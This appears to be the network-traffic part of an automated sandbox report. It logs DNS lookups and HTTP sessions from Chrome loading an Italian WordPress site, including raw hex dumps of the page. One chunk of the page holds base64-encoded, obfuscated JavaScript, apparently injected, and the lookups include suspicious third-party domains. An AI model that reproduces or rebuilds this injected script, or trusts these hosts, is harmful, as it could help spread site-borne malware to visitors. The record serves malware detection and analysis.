                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.66A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.195A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.80A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.68A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.261076927 CET1.1.1.1192.168.2.160xb466No error (0)mira-tmc.tm-4.office.com52.123.243.216A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.331347942 CET1.1.1.1192.168.2.160xb920No error (0)t3.awagama.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.344852924 CET1.1.1.1192.168.2.160xc735No error (0)t3.awagama.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:58.344852924 CET1.1.1.1192.168.2.160xc735No error (0)t3.awagama.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.155143976 CET1.1.1.1192.168.2.160x7975No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.156277895 CET1.1.1.1192.168.2.160x30b6No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.533345938 CET1.1.1.1192.168.2.160x46e8No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.533345938 CET1.1.1.1192.168.2.160x46e8No error (0)googlehosted.l.googleusercontent.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:33:59.534615040 CET1.1.1.1192.168.2.160x9accNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:01.258341074 CET1.1.1.1192.168.2.160xaa29No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:01.258341074 CET1.1.1.1192.168.2.160xaa29No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.671504974 CET1.1.1.1192.168.2.160x15ceNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.671504974 CET1.1.1.1192.168.2.160x15ceNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.671602964 CET1.1.1.1192.168.2.160xf36eNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.671626091 CET1.1.1.1192.168.2.160x5b53No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.671626091 CET1.1.1.1192.168.2.160x5b53No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.672745943 CET1.1.1.1192.168.2.160x55c5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.679824114 CET1.1.1.1192.168.2.160xf146No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.679874897 CET1.1.1.1192.168.2.160xa299No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:02.679874897 CET1.1.1.1192.168.2.160xa299No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.627167940 CET1.1.1.1192.168.2.160xb1d8No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.627167940 CET1.1.1.1192.168.2.160xb1d8No error (0)plus.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.628035069 CET1.1.1.1192.168.2.160x656fNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.672357082 CET1.1.1.1192.168.2.160xecb8No error (0)t3.awagama.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.672357082 CET1.1.1.1192.168.2.160xecb8No error (0)t3.awagama.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:06.672744989 CET1.1.1.1192.168.2.160x3c2eNo error (0)t3.awagama.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:07.623394012 CET1.1.1.1192.168.2.160xe411No error (0)play.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.385324001 CET1.1.1.1192.168.2.160x7bc4No error (0)forms.pienissimo.comd37vrkxza2boa5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.385324001 CET1.1.1.1192.168.2.160x7bc4No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.78A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.385324001 CET1.1.1.1192.168.2.160x7bc4No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.385324001 CET1.1.1.1192.168.2.160x7bc4No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.13A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.385324001 CET1.1.1.1192.168.2.160x7bc4No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.116A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:10.404361010 CET1.1.1.1192.168.2.160x4c94No error (0)forms.pienissimo.comd37vrkxza2boa5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350862026 CET1.1.1.1192.168.2.160x89f9No error (0)unpkg.com104.17.246.203A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350862026 CET1.1.1.1192.168.2.160x89f9No error (0)unpkg.com104.17.248.203A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350862026 CET1.1.1.1192.168.2.160x89f9No error (0)unpkg.com104.17.249.203A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350862026 CET1.1.1.1192.168.2.160x89f9No error (0)unpkg.com104.17.245.203A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350862026 CET1.1.1.1192.168.2.160x89f9No error (0)unpkg.com104.17.247.203A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:11.350883007 CET1.1.1.1192.168.2.160x34b6No error (0)unpkg.com65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.273845911 CET1.1.1.1192.168.2.160x7214No error (0)forms.pienissimo.comd37vrkxza2boa5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.273845911 CET1.1.1.1192.168.2.160x7214No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.116A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.273845911 CET1.1.1.1192.168.2.160x7214No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.78A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.273845911 CET1.1.1.1192.168.2.160x7214No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.13A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.273845911 CET1.1.1.1192.168.2.160x7214No error (0)d37vrkxza2boa5.cloudfront.net18.245.60.119A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.287244081 CET1.1.1.1192.168.2.160x7626No error (0)forms.pienissimo.comd37vrkxza2boa5.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.741517067 CET1.1.1.1192.168.2.160xc88aNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.741517067 CET1.1.1.1192.168.2.160xc88aNo error (0)scontent.xx.fbcdn.net157.240.252.13A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.741779089 CET1.1.1.1192.168.2.160xf887No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.741779089 CET1.1.1.1192.168.2.160xf887No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:12.741779089 CET1.1.1.1192.168.2.160xf887No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.063510895 CET1.1.1.1192.168.2.160xb782No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.063510895 CET1.1.1.1192.168.2.160xb782No error (0)scontent.xx.fbcdn.net157.240.252.13A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.063987970 CET1.1.1.1192.168.2.160x1543No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.063987970 CET1.1.1.1192.168.2.160x1543No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:14.063987970 CET1.1.1.1192.168.2.160x1543No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.327889919 CET1.1.1.1192.168.2.160x477dNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.327889919 CET1.1.1.1192.168.2.160x477dNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.327889919 CET1.1.1.1192.168.2.160x477dNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.328038931 CET1.1.1.1192.168.2.160x35f0No error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:15.389070034 CET1.1.1.1192.168.2.160x2ac7No error (0)enginev2.pienissimo.com3.124.71.130A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.007266045 CET1.1.1.1192.168.2.160xaf6bNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.007266045 CET1.1.1.1192.168.2.160xaf6bNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.007266045 CET1.1.1.1192.168.2.160xaf6bNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.007726908 CET1.1.1.1192.168.2.160xb99aNo error (0)api.ipify.org65IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:16.460442066 CET1.1.1.1192.168.2.160x5a1fNo error (0)enginev2.pienissimo.com3.124.71.130A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.779814005 CET1.1.1.1192.168.2.160x83cdNo error (0)pienissimo.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)pienissimo.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.206A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.136.177A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.126A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.169.54A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.170.242A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.4A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.139.171A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:18.780730009 CET1.1.1.1192.168.2.160x11d9No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.47.152A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)pienissimo.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.136.176A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.19A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.170.206A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.136.190A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.170.82A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com52.219.75.196A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.136.216A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.934277058 CET1.1.1.1192.168.2.160x4795No error (0)s3-r-w.eu-central-1.amazonaws.com3.5.135.217A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:19.942382097 CET1.1.1.1192.168.2.160x9704No error (0)pienissimo.s3.eu-central-1.amazonaws.coms3-r-w.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.247626066 CET1.1.1.1192.168.2.160xd0c2No error (0)www.cloudflare.com104.16.124.96A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.247626066 CET1.1.1.1192.168.2.160xd0c2No error (0)www.cloudflare.com104.16.123.96A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.862092018 CET1.1.1.1192.168.2.160xe641No error (0)static.cloudflareinsights.com104.16.80.73A (IP address)IN (0x0001)false
                                                                                                                                              Jan 3, 2025 17:34:44.862092018 CET1.1.1.1192.168.2.160xe641No error (0)static.cloudflareinsights.com104.16.79.73A (IP address)IN (0x0001)false
                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.164970889.46.108.67806952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Jan 3, 2025 17:32:45.276675940 CET435OUTGET / HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Jan 3, 2025 17:32:45.943126917 CET430INHTTP/1.1 301 Moved Permanently
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:45 GMT
                                                                                                                                              Content-Type: text/html
                                                                                                                                              Content-Length: 168
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Location: https://www.cipassoitalia.it/
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 61 72 75 62 61 2d 70 72 6f 78 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>aruba-proxy</center></body></html>
                                                                                                                                              Jan 3, 2025 17:33:30.957741022 CET6OUTData Raw: 00
                                                                                                                                              Data Ascii:


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              1192.168.2.164970989.46.108.67806952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              Jan 3, 2025 17:33:30.288738966 CET6OUTData Raw: 00
                                                                                                                                              Data Ascii:


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              0192.168.2.164971089.46.108.674436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2025-01-03 16:32:46 UTC663OUTGET / HTTP/1.1
                                                                                                                                              Host: www.cipassoitalia.it
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2025-01-03 16:32:47 UTC485INHTTP/1.1 200 OK
                                                                                                                                              Server: aruba-proxy
                                                                                                                                              Date: Fri, 03 Jan 2025 16:32:46 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              Link: <https://www.cipassoitalia.it/wp-json/>; rel="https://api.w.org/", <https://www.cipassoitalia.it/wp-json/wp/v2/pages/838>; rel="alternate"; type="application/json", <https://www.cipassoitalia.it/>; rel=shortlink
                                                                                                                                              X-ServerName: webx.aruba.it
                                                                                                                                              X-Aruba-Cache: HIT
                                                                                                                                              Alt-Svc: h3=":443"; ma=86400
                                                                                                                                              2025-01-03 16:32:47 UTC15899INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 64 69 73 61 62 6c 65 64 20 61 76 2d 64 65 66 61 75 6c 74 2d 6c 69 67 68 74 62 6f 78 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 6c 65 66 74 20 68 74 6d 6c 5f 6d 61 69 6e 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 63 75 73 74 6f 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 62 61
                                                                                                                                              Data Ascii: 8000<!DOCTYPE html><html lang="it-IT" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking html_header_topba
                                                                                                                                              2025-01-03 16:32:47 UTC16384INData Raw: 39 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 61 76 69 61 2d 6d 6f 64 75 6c 65 2d 70 72 6f 6d 6f 62 6f 78 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 69 70 61 73 73 6f 69 74 61 6c 69 61 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 66 6f 6c 64 2f 63 6f 6e 66 69 67 2d 74 65 6d 70 6c 61 74 65 62 75 69 6c 64 65 72 2f 61 76 69 61 2d 73 68 6f 72 74 63 6f 64 65 73 2f 70 72 6f 6d 6f 62 6f 78 2f 70 72 6f 6d 6f 62 6f 78 2e 63 73 73 3f 76 65 72 3d 36 2e 30 2e 39 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e
                                                                                                                                              Data Ascii: 9' type='text/css' media='all' /><link rel='stylesheet' id='avia-module-promobox-css' href='https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=6.0.9' type='text/css' media='all' /><lin
                                                                                                                                              2025-01-03 16:32:47 UTC16384INData Raw: 57 45 34 49 43 73 67 4d 48 67 78 49 43 6f 67 4c 54 42 34 4e 44 51 32 49 43 73 67 4d 48 67 35 49 43 6f 67 4d 48 67 7a 4f 57 55 70 4b 53 6b 73 49 47 78 6c 62 69 41 39 49 46 38 77 65 44 4d 31 4e 32 51 33 59 6c 74 66 4d 48 67 7a 4d 32 55 35 5a 6a 59 6f 4d 48 67 78 4e 6a 4d 70 58 53 68 4f 64 57 31 69 5a 58 49 73 49 46 38 77 65 44 4d 31 4e 32 51 33 59 6c 74 66 4d 48 67 7a 4d 32 55 35 5a 6a 59 6f 4d 48 67 78 4e 6a 4d 70 58 53 68 66 4d 48 67 33 4e 6a 46 68 4e 44 45 73 49 48 56 75 61 47 56 34 5a 57 52 62 58 7a 42 34 4d 7a 4e 6c 4f 57 59 32 4b 44 42 34 4d 54 51 35 4b 56 30 6f 4d 48 67 7a 59 69 41 71 49 43 30 77 65 44 49 34 49 43 73 67 4c 54 42 34 4f 57 59 31 49 43 6f 67 4d 48 67 78 49 43 73 67 4c 54 42 34 4d 32 51 67 4b 69 41 74 4d 48 67 31 4d 53 77 67 58 7a 42 34
                                                                                                                                              Data Ascii: WE4ICsgMHgxICogLTB4NDQ2ICsgMHg5ICogMHgzOWUpKSksIGxlbiA9IF8weDM1N2Q3YltfMHgzM2U5ZjYoMHgxNjMpXShOdW1iZXIsIF8weDM1N2Q3YltfMHgzM2U5ZjYoMHgxNjMpXShfMHg3NjFhNDEsIHVuaGV4ZWRbXzB4MzNlOWY2KDB4MTQ5KV0oMHgzYiAqIC0weDI4ICsgLTB4OWY1ICogMHgxICsgLTB4M2QgKiAtMHg1MSwgXzB4
                                                                                                                                              2025-01-03 16:32:47 UTC16384INData Raw: 20 77 69 64 74 68 3d 22 33 33 33 22 20 20 69 74 65 6d 70 72 6f 70 3d 22 74 68 75 6d 62 6e 61 69 6c 55 72 6c 22 20 20 2f 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 32 30 70 78 27 20 63 6c 61 73 73 3d 27 68 72 20 68 72 2d 69 6e 76 69 73 69 62 6c 65 20 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 38 20 20 65 6c 5f 61 66 74 65 72 5f 61 76 5f 69 6d 61 67 65 20 20 65 6c 5f 62 65 66 6f 72 65 5f 61 76 5f 73 6c 69 64 65 73 68 6f 77 5f 61 63 63 6f 72 64 69 6f 6e 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 6c 61 73 74 20 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 20 27 20 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 2d 73 74 79
                                                                                                                                              Data Ascii: width="333" itemprop="thumbnailUrl" /></div></div></div><div style='height:20px' class='hr hr-invisible avia-builder-el-8 el_after_av_image el_before_av_slideshow_accordion avia-builder-el-last '><span class='hr-inner ' ><span class='hr-inner-sty
                                                                                                                                              2025-01-03 16:32:47 UTC16384INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 63 6c 65 61 72 66 69 78 27 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 68 65 69 67 68 74 3a 32 30 70 78 27 20 63 6c 61 73 73 3d 27 68 72 20 68 72 2d 69 6e 76 69 73 69 62 6c 65 20 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 32 36 20 20 65 6c 5f 61 66 74 65 72 5f 61 76 5f 6c 61 79 6f 75 74 5f 72 6f 77 20 20 65 6c 5f 62 65 66 6f 72 65 5f 61 76 5f 73 65 63 74 69 6f 6e 20 20 61 76 69 61 2d 62 75 69 6c 64 65 72 2d 65 6c 2d 6e 6f 2d 73 69 62 6c 69 6e 67 20 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 20 27 20 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 72 2d 69 6e 6e 65 72 2d 73 74 79 6c 65 27 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70
                                                                                                                                              Data Ascii: <div class='entry-content-wrapper clearfix'><div style='height:20px' class='hr hr-invisible avia-builder-el-26 el_after_av_layout_row el_before_av_section avia-builder-el-no-sibling '><span class='hr-inner ' ><span class='hr-inner-style'></span></sp
